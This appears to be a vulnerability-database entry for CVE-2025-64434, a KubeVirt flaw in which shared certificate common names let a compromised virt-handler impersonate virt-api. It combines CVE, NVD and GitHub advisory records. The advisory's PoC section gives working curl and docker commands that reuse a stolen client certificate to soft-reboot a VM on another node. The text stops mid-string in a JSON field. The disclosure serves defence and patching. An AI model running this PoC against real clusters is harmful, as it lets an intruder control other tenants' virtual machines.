CVE-2025-64434 (GCVE-0-2025-64434)
Vulnerability from cvelistv5 – Published: 2025-11-07 22:54 – Updated: 2025-11-10 19:03 – CWE-287 - Improper Authentication
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-64434",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-10T19:02:59.922086Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-10T19:03:26.345Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "kubevirt",
"vendor": "kubevirt",
"versions": [
{
"status": "affected",
"version": "\u003c 1.5.3"
},
{
"status": "affected",
"version": "\u003e= 1.6.0-alpha.0, \u003c 1.6.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-287",
"description": "CWE-287: Improper Authentication",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-07T22:54:04.772Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074"
}
],
"source": {
"advisory": "GHSA-ggp9-c99x-54gp",
"discovery": "UNKNOWN"
},
"title": "KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-64434",
"datePublished": "2025-11-07T22:54:04.772Z",
"dateReserved": "2025-11-03T22:12:51.365Z",
"dateUpdated": "2025-11-10T19:03:26.345Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-64434\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-11-07T23:15:45.690\",\"lastModified\":\"2025-11-25T17:05:28.493\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.\"},{\"lang\":\"es\",\"value\":\"KubeVirt es un complemento de gesti\u00f3n de m\u00e1quinas virtuales para Kubernetes. Antes de las versiones 1.5.3 y 1.6.1, debido a la l\u00f3gica de verificaci\u00f3n de pares en virt-handler (a trav\u00e9s de verifyPeerCert), un atacante que comprometiese una instancia de virt-handler podr\u00eda explotar estas credenciales compartidas para suplantar a virt-API y ejecutar operaciones privilegiadas contra otras instancias de virt-handler, comprometiendo potencialmente la integridad y disponibilidad de la m\u00e1quina virtual gestionada por esta. 
Esta vulnerabilidad est\u00e1 corregida en las versiones 1.5.3 y 1.6.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":4.7,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.0,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H\",\"baseScore\":6.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.0,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-287\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*\",\"versionEndExcluding\":\"1.5.3\",\"matchCriteriaId\":\"D06A16D0-A19D-4FC9-BBB2-DD155157AD8E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:1.6.0:*:*:*:*:kubernetes:*:*\",\"matchCriteriaId\":\"78254CFF-E38D-4C0A-AB4B-3F41FCBB2A3C\"}]}]}],\"references\":[{\"url\":\"https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b\",\"source\":\"security-advisories@github.com\",\
"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-64434\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-11-10T19:02:59.922086Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-11-10T19:03:17.018Z\"}}], \"cna\": {\"title\": \"KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing\", \"source\": {\"advisory\": \"GHSA-ggp9-c99x-54gp\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 4.7, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"kubevirt\", \"product\": \"kubevirt\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.5.3\"}, {\"status\": \"affected\", \"version\": \"\u003e= 1.6.0-alpha.0, \u003c 1.6.1\"}]}], \"references\": [{\"url\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp\", \"name\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a\", \"name\": \"https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b\", \"name\": 
\"https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074\", \"name\": \"https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-287\", \"description\": \"CWE-287: Improper Authentication\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-11-07T22:54:04.772Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-64434\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-10T19:03:26.345Z\", \"dateReserved\": \"2025-11-03T22:12:51.365Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-11-07T22:54:04.772Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2025-64434
Vulnerability from fkie_nvd - Published: 2025-11-07 23:15 - Updated: 2025-11-25 17:05 - 6.3 (Medium) - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H (NVD primary score; the CNA/GitHub vector in the same record rates integrity NONE for a 4.7 base score. Note also that the NVD CPE configuration matches only 1.6.0 exactly, whereas the CNA range covers >= 1.6.0-alpha.0, < 1.6.1.)
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*",
"matchCriteriaId": "D06A16D0-A19D-4FC9-BBB2-DD155157AD8E",
"versionEndExcluding": "1.5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:*:*:*:*:kubernetes:*:*",
"matchCriteriaId": "78254CFF-E38D-4C0A-AB4B-3F41FCBB2A3C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1."
},
{
"lang": "es",
"value": "KubeVirt es un complemento de gesti\u00f3n de m\u00e1quinas virtuales para Kubernetes. Antes de las versiones 1.5.3 y 1.6.1, debido a la l\u00f3gica de verificaci\u00f3n de pares en virt-handler (a trav\u00e9s de verifyPeerCert), un atacante que comprometiese una instancia de virt-handler podr\u00eda explotar estas credenciales compartidas para suplantar a virt-API y ejecutar operaciones privilegiadas contra otras instancias de virt-handler, comprometiendo potencialmente la integridad y disponibilidad de la m\u00e1quina virtual gestionada por esta. Esta vulnerabilidad est\u00e1 corregida en las versiones 1.5.3 y 1.6.1."
}
],
"id": "CVE-2025-64434",
"lastModified": "2025-11-25T17:05:28.493",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.0,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.0,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-11-07T23:15:45.690",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-287"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-GGP9-C99X-54GP
Vulnerability from github – Published: 2025-11-06 23:35 – Updated: 2025-11-27 08:48
Summary
Due to improper TLS certificate management, a compromised virt-handler could impersonate virt-api by using its own TLS credentials, allowing it to initiate privileged operations against another virt-handler.
Details
Because of improper TLS certificate management, a compromised virt-handler instance can reuse its TLS bundle to impersonate virt-api, enabling unauthorized access to VM lifecycle operations on other virt-handler nodes.
The virt-api component acts as a sub-resource server, and it proxies API VM lifecycle requests to virt-handler instances.
The communication between virt-api and virt-handler instances is secured using mTLS. The former acts as the client while the latter acts as the server. The client certificate used by virt-api is defined in the source code as follows and has the following properties:
//pkg/virt-api/api.go
const (
...
defaultCAConfigMapName = "kubevirt-ca"
...
defaultHandlerCertFilePath = "/etc/virt-handler/clientcertificates/tls.crt"
defaultHandlerKeyFilePath = "/etc/virt-handler/clientcertificates/tls.key"
)
# verify virt-api's certificate properties from the docker container in which it is deployed using Minikube
admin@minikube:~$ openssl x509 -text -in \
$(CID=$(docker ps --filter 'Name=virt-api' --format '{{.ID}}' | head -n 1) && \
docker inspect $CID | grep "clientcertificates:ro" | cut -d ":" -f1 | \
tr -d '"[:space:]')/tls.crt | \
grep -e "Subject:" -e "Issuer:" -e "Serial"
Serial Number: 127940157512425330 (0x1c688e539091f72)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:client:virt-handler
The virt-handler component verifies the signature of client certificates using a self-signed root CA. The latter is generated by virt-operator when the KubeVirt stack is deployed and is stored in a ConfigMap in the kubevirt namespace. This ConfigMap is used as the trust anchor by all virt-handler instances to verify client certificates.
# inspect the self-signed root CA used to sign virt-api and virt-handler's certificates
admin@minikube:~$ kubectl -n kubevirt get configmap kubevirt-ca -o jsonpath='{.data.ca-bundle}' | openssl x509 -text | grep -e "Subject:" -e "Issuer:" -e "Serial"
Serial Number: 319368675363923930 (0x46ea01e3f7427da)
Issuer: CN=kubevirt.io@1747579138
Subject: CN=kubevirt.io@1747579138
The kubevirt-ca is also used to sign the server certificate which is used by a virt-handler instance:
admin@minikube:~$ openssl x509 -text -in \
$(CID=$(docker ps --filter 'Name=virt-handler' --format '{{.ID}}' | head -n 1) && \
docker inspect $CID | grep "servercertificates:ro" | cut -d ":" -f1 | \
tr -d '"[:space:]')/tls.crt | \
grep -e "Subject:" -e "Issuer:" -e "Serial"
# the virt-handler's server certificate is issued by the same root CA
Serial Number: 7584450293644921758 (0x6941615ba1500b9e)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:node:virt-handler
In addition to the validity of the signature, the virt-handler component also verifies the CN field of the presented certificate. Note that, as the comments below state, the server sets `InsecureSkipVerify: true`, so Go's built-in chain and hostname verification is disabled and `VerifyPeerCertificate` is the only check that runs; the CN comparison in `verifyPeerCert` is therefore the sole identity check beyond the CA signature:
//pkg/util/tls/tls.go
func SetupTLSForVirtHandlerServer(caManager ClientCAManager, certManager certificate.Manager, externallyManaged bool, clusterConfig *virtconfig.ClusterConfig) *tls.Config {
// #nosec cause: InsecureSkipVerify: true
// resolution: Neither the client nor the server should validate anything itself, `VerifyPeerCertificate` is still executed
//...
// XXX: We need to verify the cert ourselves because we don't have DNS or IP on the certs at the moment
VerifyPeerCertificate: func(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {
return verifyPeerCert(rawCerts, externallyManaged, certPool, x509.ExtKeyUsageClientAuth, "client")
},
//...
}
func verifyPeerCert(rawCerts [][]byte, externallyManaged bool, certPool *x509.CertPool, usage x509.ExtKeyUsage, commonName string) error {
//...
rawPeer, rawIntermediates := rawCerts[0], rawCerts[1:]
c, err := x509.ParseCertificate(rawPeer)
//...
fullCommonName := fmt.Sprintf("kubevirt.io:system:%s:virt-handler", commonName)
if !externallyManaged && c.Subject.CommonName != fullCommonName {
return fmt.Errorf("common name is invalid, expected %s, but got %s", fullCommonName, c.Subject.CommonName)
}
//...
The above code illustrates that client certificates accepted by KubeVirt must have the CN kubevirt.io:system:client:virt-handler, which is exactly the CN present in virt-api's certificate. However, virt-api is not the only component in the KubeVirt stack that communicates with a virt-handler instance.
In addition to the extension API server, any other virt-handler can communicate with it. This happens in the context of VM migration operations. When a VM is migrated from one node to another, the virt-handlers on both nodes are going to use structures called ProxyManager to communicate back and forth on the state of the migration.
//pkg/virt-handler/migration-proxy/migration-proxy.go
// NewMigrationProxyManager builds the ProxyManager a virt-handler uses during VM
// migration. It keeps two separate TLS configurations: serverTLSConfig and
// clientTLSConfig. Per the advisory text above, the migration destination acts as
// the TLS server and the migration source as the TLS client; which certificates
// are loaded into each config is decided by the caller and is not visible here.
// Both proxy maps (keyed by string, holding *migrationProxy slices) start empty.
//
// NOTE(review): the advisory states that the client certificate a virt-handler
// presents carries the same CN as virt-api's client certificate, so nothing in
// this constructor distinguishes the two callers — confirm against the call site.
func NewMigrationProxyManager(serverTLSConfig *tls.Config, clientTLSConfig *tls.Config, config *virtconfig.ClusterConfig) ProxyManager {
return &migrationProxyManager{
sourceProxies: make(map[string][]*migrationProxy),
targetProxies: make(map[string][]*migrationProxy),
serverTLSConfig: serverTLSConfig,
clientTLSConfig: clientTLSConfig,
config: config,
}
}
This communication follows a classical client-server model, where the virt-handler on the migration source node acts as a client and the virt-handler on the migration destination node acts as a server. This communication is also secured using mTLS. The server certificate presented by the virt-handler acting as a migration destination node is the same as the one which is used for the communication between the same virt-handler and the virt-api in the context of VM lifecycle operations (CN=kubevirt.io:system:node:virt-handler). However, the client certificate which is used by a virt-handler instance has the same CN as the client certificate used by virt-api.
admin@minikube:~$ openssl x509 -text -in $(CID=$(docker ps --filter 'Name=virt-handler' --format '{{.ID}}' | head -n 1) && docker inspect $CID | grep "clientcertificates:ro" | cut -d ":" -f1 | tr -d '"[:space:]')/tls.crt | grep -e "Subject:" -e "Issuer:" -e "Serial"
Serial Number: 2951695854686290384 (0x28f687bdb791c1d0)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:client:virt-handler
Although the migration procedure, where two separate virt-handler instances coordinate the transfer of a VM's state, is not directly tied to the communication between virt-api and virt-handler during VM lifecycle management, there is a critical overlap in the TLS authentication mechanism. Specifically, the client certificates used by virt-handler and by virt-api share the same CN field, even though the two types of communication use different, randomly allocated ports; the port alone does not distinguish the two clients.
PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
To illustrate the vulnerability, a Minikube cluster has been deployed with two nodes (minikube and minikube-m02), and thus with two virt-handler instances, alongside a VMI running on one of the nodes. It is assumed that an attacker has obtained access to the client certificate bundle used by the virt-handler instance running on the compromised node (minikube) while the virtual machine is running on the other node (minikube-m02). Thus, they can interact with the sub-resource API exposed by the other virt-handler instance and control the lifecycle of the VMs running on the other node:
# the deployed VMI on the non-compromised node minikube-m02
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
labels:
kubevirt.io/size: small
name: mishandling-common-name-in-certificate-handler
spec:
domain:
devices:
disks:
- name: containerdisk
disk:
bus: virtio
- name: cloudinitdisk
disk:
bus: virtio
resources:
requests:
memory: 1024M
terminationGracePeriodSeconds: 0
volumes:
- name: containerdisk
containerDisk:
image: quay.io/kubevirt/cirros-container-disk-demo
- name: cloudinitdisk
cloudInitNoCloud:
userDataBase64: SGkuXG4=
# the IP of the non-compromised handler running on the node minikube-m02 is 10.244.1.3
attacker@minikube:~$ curl -k https://10.244.1.3:8186/
curl: (56) OpenSSL SSL_read: error:0A00045C:SSL routines::tlsv13 alert certificate required, errno 0
# get the certificate bundle directory and redo the request
attacker@minikube:~$ export CERT_DIR=$(docker inspect $(docker ps --filter 'Name=virt-handler' --format='{{.ID}}' | head -n 1) | grep "clientcertificates:ro" | cut -d ':' -f1 | tr -d '"[:space:]')
attacker@minikube:~$ curl -k --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key https://10.244.1.3:8186/
404: Page Not Found
# soft reboot the VMI instance running on the other node
attacker@minikube:~$ curl -ki --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key https://10.244.1.3:8186/v1/namespaces/default/virtualmachineinstances/mishandling-common-name-in-certificate-handler/softreboot -XPUT
HTTP/1.1 202 Accepted
# the VMI mishandling-common-name-in-certificate-handler has been rebooted
Impact
What kind of vulnerability is it? Who is impacted?
Due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances, potentially compromising the integrity and availability of the VMs they manage.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "1.6.0-alpha.0"
},
{
"fixed": "1.6.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-64434"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-06T23:35:03Z",
"nvd_published_at": "2025-11-07T23:15:45Z",
"severity": "MODERATE"
},
"details": "### Summary\nDue to improper TLS certificate management, a compromised `virt-handler` could impersonate `virt-api` by using its own TLS credentials, allowing it to initiate privileged operations against another `virt-handler`.\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\nBecause of improper TLS certificate management, a compromised `virt-handler` instance can reuse its TLS bundle to impersonate `virt-api`, enabling unauthorized access to VM lifecycle operations on other `virt-handler` nodes. \nThe `virt-api` component acts as a sub-resource server, and it proxies API VM lifecycle requests to `virt-handler` instances.\nThe communication between `virt-api` and `virt-handler` instances is secured using mTLS. The former acts as a client while the latter as the server. The client certificate used by `virt-api` is defined in the source code as follows and have the following properties: \n\n```go\n//pkg/virt-api/api.go\n\nconst (\n\t...\n\tdefaultCAConfigMapName = \"kubevirt-ca\"\n ...\n\tdefaultHandlerCertFilePath = \"/etc/virt-handler/clientcertificates/tls.crt\"\n\tdefaultHandlerKeyFilePath = \"/etc/virt-handler/clientcertificates/tls.key\"\n)\n```\n\n```bash\n# verify virt-api\u0027s certificate properties from the docker container in which it is deployed using Minikube\nadmin@minikube:~$ openssl x509 -text -in \\ \n$(CID=$(docker ps --filter \u0027Name=virt-api\u0027 --format \u0027{{.ID}}\u0027 | head -n 1) \u0026\u0026 \\\ndocker inspect $CID | grep \"clientcertificates:ro\" | cut -d \":\" -f1 | \\\ntr -d \u0027\"[:space:]\u0027)/tls.crt | \\\ngrep -e \"Subject:\" -e \"Issuer:\" -e \"Serial\"\n\nSerial Number: 127940157512425330 (0x1c688e539091f72)\nIssuer: CN = kubevirt.io@1747579138\nSubject: CN = kubevirt.io:system:client:virt-handler\n```\n\nThe `virt-handler` component verifies the signature of client certificates using a self-signed root CA. 
This latter is generated by `virt-operator` when the KubeVirt stack is deployed and it is stored within a ConfigMap in the `kubevirt` namespace. **This configmap is used as a trust anchor** by all `virt-handler` instances to verify client certificates.\n\n```bash\n# inspect the self-signed root CA used to sign virt-api and virt-handler\u0027s certificates\nadmin@minikube:~$ kubectl -n kubevirt get configmap kubevirt-ca -o jsonpath=\u0027{.data.ca-bundle}\u0027 | openssl x509 -text | grep -e \"Subject:\" -e \"Issuer:\" -e \"Serial\"\n\nSerial Number: 319368675363923930 (0x46ea01e3f7427da)\nIssuer: CN=kubevirt.io@1747579138\nSubject: CN=kubevirt.io@1747579138\n```\n\nThe `kubevirt-ca` is also used to sign the server certificate which is used by a `virt-handler` instance:\n\n\n```bash\nadmin@minikube:~$ openssl x509 -text -in \\ \n$(CID=$(docker ps --filter \u0027Name=virt-handler\u0027 --format \u0027{{.ID}}\u0027 | head -n 1) \u0026\u0026 \\\ndocker inspect $CID | grep \"servercertificates:ro\" | cut -d \":\" -f1 | \\\ntr -d \u0027\"[:space:]\u0027)/tls.crt | \\\ngrep -e \"Subject:\" -e \"Issuer:\" -e \"Serial\"\n\n# the virt-handler\u0027s server ceriticate is issued by the same root CA\nSerial Number: 7584450293644921758 (0x6941615ba1500b9e)\nIssuer: CN = kubevirt.io@1747579138\nSubject: CN = kubevirt.io:system:node:virt-handler\n```\n\n\nIn addition to the validity of the signature, the `virt-handler` component also verifies the CN field of the presented certificate:\n\n\u003ccode.sec.SetupTLSForVirtHandlerServer\u003e\n```go \n//pkg/util/tls/tls.go\n\nfunc SetupTLSForVirtHandlerServer(caManager ClientCAManager, certManager certificate.Manager, externallyManaged bool, clusterConfig *virtconfig.ClusterConfig) *tls.Config {\n\t// #nosec cause: InsecureSkipVerify: true\n\t// resolution: Neither the client nor the server should validate anything itself, `VerifyPeerCertificate` is still executed\n\t\n\t//...\n\t\t\t\t// XXX: We need to verify the cert ourselves 
